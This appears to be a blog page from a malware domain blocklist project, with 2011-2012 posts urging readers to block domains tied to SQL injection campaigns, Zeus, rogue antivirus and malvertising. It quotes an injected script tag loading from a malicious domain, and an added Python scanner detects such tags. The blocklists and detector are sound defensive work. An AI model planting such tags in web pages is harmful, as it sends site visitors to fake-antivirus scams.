Domains and IPs to Block ASAP

Posted on August 9th, 2012 in 0day,sql injection by dglosser

Two posts from the Internet Storm Center:

SQL Injection Lilupophilupop style – lists about a dozen domains you should immediately add to your blocklists, plus more in Dynamoo's blog.

Zeus/Citadel variant causing issues in the Netherlands – follow the links and block those IP addresses.

sqli: Block njukol -dot- com

Posted on April 29th, 2012 in 0day,iframes,New Domains,sql injection by dglosser

We received a report that there’s a SQL injection campaign going on with njukol . com/r.php. Please check your web sites and add this to your block or shun list.

Original source: http://ilion.blog47.fc2.com/

hostexploit.com top bad hosts – 2012 Q1

Posted on April 18th, 2012 in iframes,malvertising,New Domains,sql injection,Trojans by dglosser

We added our friends nikjju . com and best-antiviruu.de .lv and also listed domains from ISPs or hosting services listed on hostexploit.com’s Q1 report on the top bad hosts. To round things out, we also added domains flagged by Sucuri as having malicious JavaScript or iframes.

Compressed files are located at: http://www.malware-domains.com (full zone files, note the dash) and http://dns-bh.sagadc.org/. We also have a mirror dedicated to research and Open Source Projects – contact us for details.

* Please help to keep this site free and donate whatever you can: all donations go to hosting and infrastructure costs.
* The malware block lists provided here are free for noncommercial use as part of the fight against malware. Any commercial use of this list is strictly prohibited without prior approval.
* Please use the “datestamp” and “timestamp” file to determine whether the list has been updated, and ONLY pull the files you need – abusers will be banned! Use “wget -N”!
* Yearly sponsorships are available. Full acknowledgment, an icon, and a link back to your site will be placed in the left sidebar.
* The Domains.txt file is the complete list along with original reference. Justdomains contains a list of only the domain names. The BOOT file is in MS DNS format. The Malwaredomains.zones file is in BIND format. Also available in AdBlock, ISA, and MaraDNS formats. A trusted source on WOT (the Web of Trust). Used by SURBL, MOREnet, SANS, and others…

Urgent Block: nikjju.com and best-antiviruu.de.lv

Posted on April 17th, 2012 in 0day,iframes,rogue antivirus,sql injection by dglosser

Sucuri is reporting a new mass SQL injection campaign. Sites are infected with the following JavaScript:

<script src= http://nikjju . com/r.php ></script>

which redirects to Fake/Rogue AV sites such as best-antiviruu. de. lv

Please add these sites to your blocklists and sinkholes ASAP.
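
To check your own pages for the injected tag described above, here is an added example (not part of the original post) that parses HTML and reports script or iframe tags whose source host is a blocklisted domain or a subdomain of one. The blocklist holds the two domains named in this post; the sample page and all function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The two domains named in this post; in practice load the full blocklist file.
BLOCKLIST = {"nikjju.com", "best-antiviruu.de.lv"}

def host_is_blocked(host, blocklist=BLOCKLIST):
    """True if host is a blocklisted domain or a subdomain of one."""
    labels = host.lower().rstrip(".").split(".")
    # Compare the host and each parent suffix (a.b.c, b.c, c), never substrings.
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))

class BlockedSrcScanner(HTMLParser):
    """Records (line, src) for script/iframe tags that load from a blocked host."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        src = (dict(attrs).get("src") or "").strip()
        try:
            host = urlsplit(src).hostname or ""  # relative URLs have no host
        except ValueError:  # malformed URL, e.g. an unclosed IPv6 bracket
            return
        if host and host_is_blocked(host):
            self.hits.append((self.getpos()[0], src))

def scan_html(text):
    """Return a list of (line_number, src) for every blocked script or iframe."""
    scanner = BlockedSrcScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.hits

# Constructed sample page: line 4 carries the injected tag in the form shown above.
SAMPLE = """<html><body>
<h1>Product list</h1>
<script src="/static/app.js"></script>
<td>Widget<script src= http://nikjju.com/r.php ></script></td>
<script src="//cdn.NIKJJU.com./x.js"></script>
<script src="http://nikjju.com.example.org/r.php"></script>
</body></html>"""

if __name__ == "__main__":
    for line, src in scan_html(SAMPLE):
        print(f"line {line}: blocked source {src}")
```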

Urgent Block: ionis90landsi -dot- rr -dot- nu — Mass Injection of WordPress Websites

Posted on March 6th, 2012 in 0day,sql injection by dglosser

Websense has posted an article relating to mass SQL injection into WordPress sites. The domain is ionis90landsi . rr . nu (spaces added).

This link seems to have a larger list of domains to block…

iframe,sqli,cybercriminal domains

Posted on December 3rd, 2011 in 0day,iframes,New Domains,Spyeye,Trojans,zeus by dglosser

A small but important update containing domains associated with iframes, cybercriminals, Zeus, and our friend lilupophilupop . com. Sources include malc0de.com, safebrowsing.google.com, www.spamhaus.org (every source is listed in the domains.txt file)…

Reminder: the mirror for compressed zip files is up and running – please contact us for details – right now it has very little usage.

Domains.txt file is the complete list along with original reference.
Justdomains contains list of only the domain names.

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format.

Also Available in AdBlock, ISA, and MaraDNS formats.

Urgent Block: lilupophilupop-dot-com (SQL Injection)

Posted on December 2nd, 2011 in 0day,sql injection by dglosser

SANS is reporting that there’s a SQLi campaign going on right now with the malicious domain lilupophilupop .com being injected into sites running MSSQL.

We will block that domain on the next update but you shouldn’t wait….

Source: http://isc.sans.edu/diary.html?storyid=12127#comment

SQLi, Fastflux Botnet, Dirt Jumper and more

Posted on October 25th, 2011 in fastflux,New Domains,RBN,rogue antivirus,Spyeye,sql injection,zeus by dglosser

Added 210 domains associated with SQLi, Dirt Jumper, RBN, fast flux botnets and other maliciousness. Sources include blog.dynamoo.com, ddanchev.blogspot.com, www.malwareurl.com and others. (Every source is listed in the domains.txt file.)

Domains.txt file is the complete list along with original reference.
Justdomains contains list of only the domain names.

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format. (The mirror for compressed zip files is up and running – please contact us for details.)

Also Available in AdBlock, ISA, and MaraDNS formats.

251 new domains: malvertising, zeus v2.0, spyeye, rogues…

Posted on June 19th, 2011 in malvertising,New Domains,rogue antivirus,sql injection,zeus by dglosser

251 new domains added. These domains are associated with Zeus v2.0, SpyEye, rogue security, malvertising, and SQL injection. Sources include tristatelogic.com, vxvault.siri-urz.net, www.spamhaus.org… (Every source is listed in the domains.txt file.)


Domains.txt file is the complete list along with original reference.
Justdomains contains list of only the domain names.

Please download files from main mirror: http://mirror1.malwaredomains.com/files/

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format.

Also Available in AdBlock, ISA, and MaraDNS formats.

Malvertising, rbn, rogue, sql injection domains

Posted on June 17th, 2011 in exploit,New Domains,RBN,rogue antivirus,sql injection,Trojans,zeus by dglosser

Added over 200 domains associated with malvertising, rogue/fake security, SQL injection, etc. Sources include blog.dynamoo.com, community.websense.com, research.zscaler.com. (Every source is listed in the domains.txt file.)


Domains.txt file is the complete list along with original reference.
Justdomains contains list of only the domain names.

Please download files from main mirror: http://mirror1.malwaredomains.com/files/

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format.

Also Available in AdBlock, ISA, and MaraDNS formats.
